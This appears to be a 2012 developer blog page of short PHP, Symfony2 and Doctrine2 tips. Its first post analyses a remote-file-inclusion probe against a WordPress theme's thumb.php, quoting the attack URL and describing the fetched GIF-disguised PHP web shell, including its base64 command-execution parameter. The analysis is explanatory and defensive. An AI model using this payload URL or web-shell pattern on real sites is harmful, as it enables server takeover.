0

Random vulnerability disected

Posted February 1st, 2012 in Razno by Metod

Recently, I received a 404 notification for the following url:

http://www.metod.si/wp-content/themes/myweblog/thumb.php?src=http://picasa.com.jcibuenosaires.com.ar/2.php

Apparently the myweblog wordpress theme had (maybe still has) a RFI vulnerability.

Fortunately I do not use that theme. But I had to wonder what was inside the “2.php” file. So I downloaded it. :)

What was inside?

The file first tries to disguise itself as GIF image – GIF89a. But after the binary data it contains PHP code.

The PHP code is obvious. If you add &lol=1, execute first block. If you add &osc=pZ…AA=, execute second block, otherwise the third.

What does the first block do?

Well nothing special. It just identified the vulnerability and outputs some system information.

Example: v0pCr3wsys:Linux …nob0dyCr3w

Second block is practically the same, except that it accepts commands directly from url.

  1. <?php
  2.  
  3. $cmd = base64_decode($osc);
  4.  

Just append &osc=some_base64_encoded_command and it will execute it (if possible).

Third block is an editor that tries to upload files, create them etc..

Quite some script. Also this shows that you have to always sanitize user input. That really cannot be stressed enough.

0

Serialization of UploadedFile is not allowed fix

Posted January 31st, 2012 in Razno by Metod

If you are doing file uploads in Symfony2 with help from the cookbook tutorial you might have ran into the following error:

Serialization of ‘Symfony\Component\HttpFoundation\File\UploadedFile’ is not allowed.

The solution I came up with involves excluding the public $file field from serialization. That way we bypass the exception.

One catch, though: this will exclude all fields that are not protected.

Add the following function to your entity:

Enjoy!

0

Check if symfony2 form has errors in a twig template

Posted January 16th, 2012 in Razno by Metod

0

Mysql CHAR_LENGTH function for Doctrine2

Posted January 15th, 2012 in Projects by Metod

Today I needed the CHAR_LENGTH function for use in DQL in Doctrine2 project. So I wrote one myself and sent a pull request to DoctrineExtensions so as to contribute to OS community.

You can get the file on github:

CharLength.php

And a quick tip on how to activate it in Symfony2:

0

How to install igbinary serializer for PHP

Posted December 13th, 2011 in Razno by Metod

This is few simple step tutorial on how to install igbinary for PHP when you have multiple versions of PHP installed.

First off, you have to use proper binary versions of the PHP version you wish to install the extension to.

1. Go to github and download/unzip the files.
2. Go into the folder you just unzipped.

3. Run phpize. Now if you don’t have the proper phpize binary in the global configuration, then just use the full path to it. I have the php version 5.3.8 installed with phpfarm, so I will use that phpize.

  1. /usr/local/php/inst/php-5.3.8/bin/phpize

4. Configure it. Make sure you put the full path to your php-config, otherwise it will not work!

  1. ./configure CFLAGS="-O2 -g" –enable-igbinary –with-php-config=/usr/local/php/inst/php-5.3.8/bin/php-config

5. Compile and install

  1. extension=igbinary.so
  2. session.serialize_handler=igbinary
  3. igbinary.compact_strings=On
  4. apc.serializer=igbinary ; only if you want apc to use igbinary

7. Restart apache (assuming you run apache).

And you should see igbinary support in your phpinfo().

5

Symfony2 Error: UsernamePasswordToken::serialize() must return a string or NULL

Posted December 5th, 2011 in Razno by Metod

Getting the following error? Symfony\Component\Security\Core\Authentication\Token\UsernamePasswordToken::serialize() must return a string or NULL

I was getting it while trying to login a user. The thing was, in my Role entity, all properties were private.

  1. class Role implements RoleInterface
  2. {
  3.     private $id;
  4.    
  5.     private $name;
  6.    
  7.     private $created_at;
  8.    
  9.     // …
  10. }

When doing some googling and checking things out, I found this comment on php.net which gave me an idea. I changed all private properties to protected and thing worked!

  1. class Role implements RoleInterface
  2. {
  3.     protected $id;
  4.    
  5.     protected $name;
  6.    
  7.     protected $created_at;
  8.    
  9.     // …
  10. }
2

Symfony2 tip: Get current route name in twig template

Posted December 5th, 2011 in Snippets by Metod
  1. {{ app.request.attributes.get(‘_route’) }}

Enjoy! ;)

0

Eclipse – Adding Files to Git Index problem

Posted December 4th, 2011 in Zanimivosti by Metod

Encountering the following error in Eclipse/Zend Studio while trying to add files in Git?

Adding Files to Git Index problem

Check if a file ‘index.lock’ exists in the .git folder located in the root folder of your project.

If so, remove it and you can continue working!

  1. rm .git/index.lock
0

How to use Pagerfanta with Symfony2 and Doctrine2

Posted November 27th, 2011 in Tehnikalije by Metod

So let’s assume you want to use a pager with your Symfony2 application. If you are like me, you type it in google and get a link to KnpPaginatorBundle. Start using it and everything goes well, until you hit an error telling you something is wrong. That something is something in the lines of:

  1. SELECT SUM(S.STH) AS something FROM

Which Zend_Paginator does not support! Here is where Pagerfanta comes into the picture.

Download the PagerfantaBundle or get it through git. Also get Pagerfanta. I decided to break PagerfantaBundle into 2 more folders. So the structure of the bundle is now:

  1. vendor\bundles\WhiteOctober\PagerfantaBundle\…

For Pagerfanta, the structure is:

  1. vendor\pagerfanta\src\…

Now, add both to autoload:

  1. // app/autoload.php
  2. $loader->registerNamespaces(array(
  3.     // …
  4.     ‘WhiteOctober’     => __DIR__.‘/../vendor/bundles’,
  5.     ‘Pagerfanta’       => __DIR__.‘/../vendor/pagerfanta/src’,
  6.     // …
  7. ));

Register the bundle with your application kernel:

  1. // app/AppKernel.php
  2. public function registerBundles()
  3. {
  4.     return array(
  5.         // …
  6.         new WhiteOctober\PagerfantaBundle\WhiteOctoberPagerfantaBundle(),
  7.         // …
  8.     );
  9. }

Now what the official documentation does not tell you is what namespaces to include to use it.

For Doctrine2 the example Controller looks like this:

In the view (I assume you are using Twig) you just do:

  1. {{ pagerfanta(examples) }}

And you can be done!

However, there is much more to Pagerfanta. You can pass in many configuration options. Here is where so called Global Variables come in handy. You can define them in app/config/config.yml:

  1. twig:
  2.     globals:
  3.         pagerfanta_opts:
  4.             previous_message: ‘&laquo;’
  5.             next_message:     ‘&raquo;’
  6.             dots_message:     ‘ … ‘

Now you can access the ‘pagerfanta_opts’ in every template:

  1. {{ pagerfanta(examples, ‘default’, pagerfanta_opts) }}

Where ‘default’ is the name of the Pagerfanta view.

For those who want to learn more about it, read the documentation on GitHub for Pagerfanta.

0

PHP Fatal error: Call to undefined function get_option()

Posted November 27th, 2011 in Razno by Metod

Getting the following error when trying to access your wp-admin/ panel in WordPress?

I had the same. I reuploaded all files, nothing changed. Then it slipped my mind – what if APC is doing some weird stuff? Turns out it did!

So, if you are getting this error and you have APC installed, turn the following option to “0″.

  1. apc.include_once_override="0"
« Older Entries